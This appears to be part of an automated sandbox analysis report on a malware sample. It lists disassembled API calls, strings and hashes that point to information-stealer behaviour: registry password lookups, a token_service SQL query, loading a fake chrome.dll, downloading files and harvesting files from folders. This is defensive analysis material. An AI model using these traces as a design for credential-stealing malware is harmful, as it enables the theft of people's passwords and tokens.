                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                      • String ID: :
                                      • API String ID: 3191641157-3653984579
                                      • Opcode ID: b3130cf40c1dd3c7cf9147a5f31127e01731d4f473a6a07740fc976ddd9062c8
                                      • Instruction ID: 7dd5c8f6c25e89eb5421da9b581f9cff4d94f04832d352fdfe902425259828cd
                                      • Opcode Fuzzy Hash: b3130cf40c1dd3c7cf9147a5f31127e01731d4f473a6a07740fc976ddd9062c8
                                      • Instruction Fuzzy Hash: B73164B1E05114DBDB04EBA0DD55DFE737AAF48305B50411EF102772E0DA38AA85CB96
                                      APIs
                                      • lstrcpy.KERNEL32(?,?), ref: 048D1892
                                        • Part of subcall function 048D91D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 048D9202
                                        • Part of subcall function 048D9657: StrStrA.SHLWAPI(\nm,00000000,00000000,?,048CA1D8,00000000,006D6E5C,00000000), ref: 048D9663
                                      • lstrcpy.KERNEL32(?,00000000), ref: 048D18CE
                                        • Part of subcall function 048D9657: lstrcpyn.KERNEL32(006D7580,\nm,\nm,?,048CA1D8,00000000,006D6E5C), ref: 048D9687
                                        • Part of subcall function 048D9657: lstrlen.KERNEL32(00000000,?,048CA1D8,00000000,006D6E5C), ref: 048D969E
                                        • Part of subcall function 048D9657: wsprintfA.USER32 ref: 048D96BE
                                      • lstrcpy.KERNEL32(?,00000000), ref: 048D1916
                                      • lstrcpy.KERNEL32(?,00000000), ref: 048D195E
                                      • lstrcpy.KERNEL32(?,00000000), ref: 048D19A5
                                      • lstrcpy.KERNEL32(?,00000000), ref: 048D19ED
                                      • lstrcpy.KERNEL32(?,00000000), ref: 048D1A35
                                      • lstrcpy.KERNEL32(?,00000000), ref: 048D1A7C
                                      • lstrcpy.KERNEL32(?,00000000), ref: 048D1AC4
                                        • Part of subcall function 048DAD97: lstrlen.KERNEL32(048C51BC,?,?,048C51BC,00420DDF), ref: 048DADA2
                                        • Part of subcall function 048DAD97: lstrcpy.KERNEL32(00420DDF,00000000), ref: 048DADFC
                                      • strtok_s.MSVCRT ref: 048D1C07
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                      • String ID:
                                      • API String ID: 4276352425-0
                                      • Opcode ID: da86a3651816fd612d9f19635d2e19fbb626f2ddea617614ccf9717b4b52eb80
                                      • Instruction ID: cbd3579306467b9e20b5cac67a16f477a6f9eb6fa234ea1d9992a27a99ca41dc
                                      • Opcode Fuzzy Hash: da86a3651816fd612d9f19635d2e19fbb626f2ddea617614ccf9717b4b52eb80
                                      • Instruction Fuzzy Hash: F57154B2D021189BDB14FB64DC88EEE7379AF54304F044E99E50AE3140EEB5AA84CF52
                                      APIs
                                      • memset.MSVCRT ref: 00407374
                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407CF0), ref: 0040739A
                                      • RegEnumValueA.ADVAPI32(00407CF0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00407411
                                      • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040746D
                                      • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B2
                                      • HeapFree.KERNEL32(00000000,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B9
                                        • Part of subcall function 00409290: vsprintf_s.MSVCRT ref: 004092AB
                                      • task.LIBCPMTD ref: 004075B5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                      • String ID: Password
                                      • API String ID: 2698061284-3434357891
                                      • Opcode ID: 3a3dd591c7cbb0d90e152054b3ac75d8c6492caf44e892e450b93b3cf6805213
                                      • Instruction ID: 394e2b55a83f95d9b644045a39dee7934e13af239b1baa97d0343fed5997f3db
                                      • Opcode Fuzzy Hash: 3a3dd591c7cbb0d90e152054b3ac75d8c6492caf44e892e450b93b3cf6805213
                                      • Instruction Fuzzy Hash: 43611EB5D041689BDB24DB50CC41BDAB7B8BF54304F0081EAE649A6181EF746FC9CF95
                                      APIs
                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 048D7939
                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 048D7976
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 048D79FA
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 048D7A01
                                      • wsprintfA.USER32 ref: 048D7A37
                                        • Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                      • String ID: :$C$\
                                      • API String ID: 1544550907-3809124531
                                      • Opcode ID: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
                                      • Instruction ID: 0392557358e36a1a54bb837109f83d40eb06cfd5e13ef2f58054c9fdb79c91b2
                                      • Opcode Fuzzy Hash: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
                                      • Instruction Fuzzy Hash: 3D41A3B1D05258EBDB10DF94CC85BDEBBB8AF48704F004599F509A7280E775AB84CBA6
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,006D6D60,00000000,?,00420E14,00000000,?,00000000), ref: 048D8527
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 048D852E
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 048D854F
                                      • __aulldiv.LIBCMT ref: 048D8569
                                      • __aulldiv.LIBCMT ref: 048D8577
                                      • wsprintfA.USER32 ref: 048D85A3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                      • String ID: @$pkm
                                      • API String ID: 2774356765-1350193380
                                      • Opcode ID: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
                                      • Instruction ID: 74717b74ffd9f982c6470722b8ae398c3b311a5d9488e3e410d2ed48f3743c61
                                      • Opcode Fuzzy Hash: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
                                      • Instruction Fuzzy Hash: B9210BB1E45358ABDB00DBD4CC45FAEBBB9FB44B15F104609F615BB280D77869008BA5
                                      APIs
                                        • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                        • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                        • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                        • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                        • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                        • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                      • InternetOpenA.WININET(00420DFB,00000001,00000000,00000000,00000000), ref: 0040615F
                                      • StrCmpCA.SHLWAPI(?,02EB7320), ref: 00406197
                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 004061DF
                                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406203
                                      • InternetReadFile.WININET(00412DB1,?,00000400,?), ref: 0040622C
                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040625A
                                      • CloseHandle.KERNEL32(?,?,00000400), ref: 00406299
                                      • InternetCloseHandle.WININET(00412DB1), ref: 004062A3
                                      • InternetCloseHandle.WININET(00000000), ref: 004062B0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                      • String ID:
                                      • API String ID: 4287319946-0
                                      • Opcode ID: 79bb47fcace65dc0c408726790117bb2adccae202de1a5eabfd6db97336226ad
                                      • Instruction ID: 62bae03b9e4771e022f65dfe0b744ca25a6527e7e90d195df508867c32b8ef77
                                      • Opcode Fuzzy Hash: 79bb47fcace65dc0c408726790117bb2adccae202de1a5eabfd6db97336226ad
                                      • Instruction Fuzzy Hash: CD5184B1A01218ABDB20EF90DC45FEE7779AB44305F0041AEF605B71C0DB786A95CF59
                                      APIs
                                        • Part of subcall function 048DAD17: lstrcpy.KERNEL32(?,00000000), ref: 048DAD5D
                                        • Part of subcall function 048C4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 048C4AA1
                                        • Part of subcall function 048C4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 048C4AB8
                                        • Part of subcall function 048C4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 048C4ACF
                                        • Part of subcall function 048C4A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 048C4AF0
                                        • Part of subcall function 048C4A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 048C4B00
                                      • InternetOpenA.WININET(00420DFB,00000001,00000000,00000000,00000000), ref: 048C63C6
                                      • StrCmpCA.SHLWAPI(?,006D6E80), ref: 048C63FE
                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 048C6446
                                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 048C646A
                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 048C6493
                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 048C64C1
                                      • CloseHandle.KERNEL32(?,?,00000400), ref: 048C6500
                                      • InternetCloseHandle.WININET(?), ref: 048C650A
                                      • InternetCloseHandle.WININET(00000000), ref: 048C6517
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                      • String ID:
                                      • API String ID: 4287319946-0
                                      • Opcode ID: b1da7730cf3e973672ea3d958da0836ae58ce978cfb0a793029a7ab8af6d853d
                                      • Instruction ID: afce178bf3ee3902563cc06a87e4884d3dab663569dc2ec25ca426f8f708b10b
                                      • Opcode Fuzzy Hash: b1da7730cf3e973672ea3d958da0836ae58ce978cfb0a793029a7ab8af6d853d
                                      • Instruction Fuzzy Hash: 4F5160B1A00218ABDB24DF64DC44BEE7779AB44305F1086ADE605F71C0EBB4BA85CF95
                                      APIs
                                      • memset.MSVCRT ref: 048D523E
                                        • Part of subcall function 048D91D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 048D9202
                                      • lstrcat.KERNEL32(?,00000000), ref: 048D5267
                                      • lstrcat.KERNEL32(?,00420FE8), ref: 048D5284
                                        • Part of subcall function 048D4DC7: wsprintfA.USER32 ref: 048D4DE3
                                        • Part of subcall function 048D4DC7: FindFirstFileA.KERNEL32(?,?), ref: 048D4DFA
                                      • memset.MSVCRT ref: 048D52CA
                                      • lstrcat.KERNEL32(?,00000000), ref: 048D52F3
                                      • lstrcat.KERNEL32(?,00421008), ref: 048D5310
                                        • Part of subcall function 048D4DC7: StrCmpCA.SHLWAPI(?,00420FC4), ref: 048D4E28
                                        • Part of subcall function 048D4DC7: StrCmpCA.SHLWAPI(?,00420FC8), ref: 048D4E3E
                                        • Part of subcall function 048D4DC7: FindNextFileA.KERNEL32(000000FF,?), ref: 048D5034
                                        • Part of subcall function 048D4DC7: FindClose.KERNEL32(000000FF), ref: 048D5049
                                      • memset.MSVCRT ref: 048D5356
                                      • lstrcat.KERNEL32(?,00000000), ref: 048D537F
                                      • lstrcat.KERNEL32(?,00421020), ref: 048D539C
                                        • Part of subcall function 048D4DC7: wsprintfA.USER32 ref: 048D4E67
                                        • Part of subcall function 048D4DC7: StrCmpCA.SHLWAPI(?,004208D3), ref: 048D4E7C
                                        • Part of subcall function 048D4DC7: wsprintfA.USER32 ref: 048D4E99
                                        • Part of subcall function 048D4DC7: PathMatchSpecA.SHLWAPI(?,?), ref: 048D4ED5
                                        • Part of subcall function 048D4DC7: lstrcat.KERNEL32(?,006D6F24), ref: 048D4F01
                                        • Part of subcall function 048D4DC7: lstrcat.KERNEL32(?,00420FE0), ref: 048D4F13
                                        • Part of subcall function 048D4DC7: lstrcat.KERNEL32(?,?), ref: 048D4F27
                                        • Part of subcall function 048D4DC7: lstrcat.KERNEL32(?,00420FE4), ref: 048D4F39
                                        • Part of subcall function 048D4DC7: lstrcat.KERNEL32(?,?), ref: 048D4F4D
                                        • Part of subcall function 048D4DC7: CopyFileA.KERNEL32(?,?,00000001), ref: 048D4F63
                                        • Part of subcall function 048D4DC7: DeleteFileA.KERNEL32(?), ref: 048D4FE8
                                      • memset.MSVCRT ref: 048D53E2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                      • String ID:
                                      • API String ID: 4017274736-0
                                      • Opcode ID: 526dae8c9c0fde88560bc6a89523ce9510f779cd9e33a96f7e7cea5f911dcca2
                                      • Instruction ID: e3d5c37b826010ac71a8e244e67c5ecca9b36882056f9af915f6d2ffa03d4eae
                                      • Opcode Fuzzy Hash: 526dae8c9c0fde88560bc6a89523ce9510f779cd9e33a96f7e7cea5f911dcca2
                                      • Instruction Fuzzy Hash: 5D4184B5E4021867EB14F770EC4AFDD73385B24705F804A55B689E60D0EEF967C88B92
                                      APIs
                                      • type_info::operator==.LIBVCRUNTIME ref: 0493F6B4
                                      • ___TypeMatch.LIBVCRUNTIME ref: 0493F7C2
                                      • CatchIt.LIBVCRUNTIME ref: 0493F813
                                      • CallUnexpected.LIBVCRUNTIME ref: 0493F92F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                      • String ID: csm$csm$csm
                                      • API String ID: 2356445960-393685449
                                      • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                      • Instruction ID: fe5b3d8fe20018bae7ee35aaa9118d6b5b156ca398e1c096d0a048c87f13e9eb
                                      • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                      • Instruction Fuzzy Hash: 93B15A35D00209EFDF18DFA4C8809AEB7B9FF8631AB14457AE8156B219D331EA51CF91
                                      APIs
                                      • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 0041735E
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                      • OpenProcess.KERNEL32(001FFFFF,00000000,0041758D,004205C5), ref: 0041739C
                                      • memset.MSVCRT ref: 004173EA
                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0041753E
                                      Strings
                                      • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041740C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: OpenProcesslstrcpymemset
                                      • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                      • API String ID: 224852652-4138519520
                                      • Opcode ID: 4eb0c3d19f3da17071fde292eb786f020f2e13f1e01cd1aee6cfe2f08f7ed460
                                      • Instruction ID: 233c3b8a05bec9dd0facad4523d46c30dcb6cb295cabbf2d5ddda9a1061df09f
                                      • Opcode Fuzzy Hash: 4eb0c3d19f3da17071fde292eb786f020f2e13f1e01cd1aee6cfe2f08f7ed460
                                      • Instruction Fuzzy Hash: 24515FB0D04218ABDB14EF91DC45BEEB7B5AF04305F1041AEE21567281EB786AC8CF59
                                      APIs
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                        • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                        • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                        • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                        • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                        • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                        • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                        • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                        • Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                      • lstrlenA.KERNEL32(00000000), ref: 0040BC6F
                                        • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BC9D
                                      • lstrlenA.KERNEL32(00000000), ref: 0040BD75
                                      • lstrlenA.KERNEL32(00000000), ref: 0040BD89
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                      • API String ID: 1440504306-1079375795
                                      • Opcode ID: 07dd89b33e34ea4361fdad8a29fbd65439c590fd4139dac0401408bfbc6ec8f6
                                      • Instruction ID: 6476b4a2e47316619015001d7be3bff7ad81932ea7eb7605c7a9cb508b765a87
                                      • Opcode Fuzzy Hash: 07dd89b33e34ea4361fdad8a29fbd65439c590fd4139dac0401408bfbc6ec8f6
                                      • Instruction Fuzzy Hash: E9B17371A111089BCB04FBA1DCA6EEE7339AF14314F40456FF50673195EF386A98CB6A
                                      APIs
                                      • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,?,004108E4), ref: 0040A098
                                      • GetProcAddress.KERNEL32(00000000,connect_to_websocket), ref: 0040A0BE
                                      • GetProcAddress.KERNEL32(00000000,free_result), ref: 0040A0D5
                                      • FreeLibrary.KERNEL32(00000000,?,004108E4), ref: 0040A0F9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressLibraryProc$FreeLoad
                                      • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                      • API String ID: 2256533930-1545816527
                                      • Opcode ID: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
                                      • Instruction ID: 41317d004e32df3368e0b40b2df30f060e9b3f1c7a199a11b2b6647de007d5a9
                                      • Opcode Fuzzy Hash: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
                                      • Instruction Fuzzy Hash: 57F01DB4E0E324EFD7009B60ED48B563BA6E318341F506437F505AB2E0E3B85494CB6B
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess$DefaultLangUser
                                      • String ID: *
                                      • API String ID: 1494266314-163128923
                                      • Opcode ID: 8ad7487ebdf551ce844e744865076748c7b192adeb82af89cb9554ed9750e1ed
                                      • Instruction ID: 485b87df60e927c5081145715141aeea1c9fd48c6e3f29f258bd7afdae13bdb0
                                      • Opcode Fuzzy Hash: 8ad7487ebdf551ce844e744865076748c7b192adeb82af89cb9554ed9750e1ed
                                      • Instruction Fuzzy Hash: AFF0E232D8E218EFD3409FE0EC0979CFB31EB05707F064296F60996190E6708A80CB52
                                      APIs
                                        • Part of subcall function 048C7597: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 048C7601
                                        • Part of subcall function 048C7597: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 048C7678
                                        • Part of subcall function 048C7597: StrStrA.SHLWAPI(00000000,0042191C,00000000), ref: 048C76D4
                                        • Part of subcall function 048C7597: GetProcessHeap.KERNEL32(00000000,?), ref: 048C7719
                                        • Part of subcall function 048C7597: HeapFree.KERNEL32(00000000), ref: 048C7720
                                      • lstrcat.KERNEL32(006D7068,0042192C), ref: 048C78CD
                                      • lstrcat.KERNEL32(006D7068,00000000), ref: 048C790F
                                      • lstrcat.KERNEL32(006D7068,00421930), ref: 048C7921
                                      • lstrcat.KERNEL32(006D7068,00000000), ref: 048C7956
                                      • lstrcat.KERNEL32(006D7068,00421934), ref: 048C7967
                                      • lstrcat.KERNEL32(006D7068,00000000), ref: 048C799A
                                      • lstrcat.KERNEL32(006D7068,00421938), ref: 048C79B4
                                      • task.LIBCPMTD ref: 048C79C2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
